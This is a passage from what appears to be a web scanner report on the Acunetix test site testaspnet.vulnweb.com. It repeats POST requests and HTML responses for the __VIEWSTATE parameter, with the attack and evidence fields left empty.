Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8622&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDAhL00mdsIZGRkscx2A5OWclJ8zajFQCGSB4%2FysIM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfxfH4CAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogafxpzPKmrvkguVWbBjdhzXWAmvkA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:46 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDAhL00mdsIZGRkscx2A5OWclJ8zajFQCGSB4/ysIM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfxfH4CAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogafxpzPKmrvkguVWbBjdhzXWAmvkA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:White" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8614&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDANmrrktsIZGRkiGlhD2TkgIETAtLT5eH2BgDVLvI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLt7pDfCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb6TfydiQdhT7aCARNke6pzAQolDA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:25 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDANmrrktsIZGRkiGlhD2TkgIETAtLT5eH2BgDVLvI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLt7pDfCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb6TfydiQdhT7aCARNke6pzAQolDA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:White" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
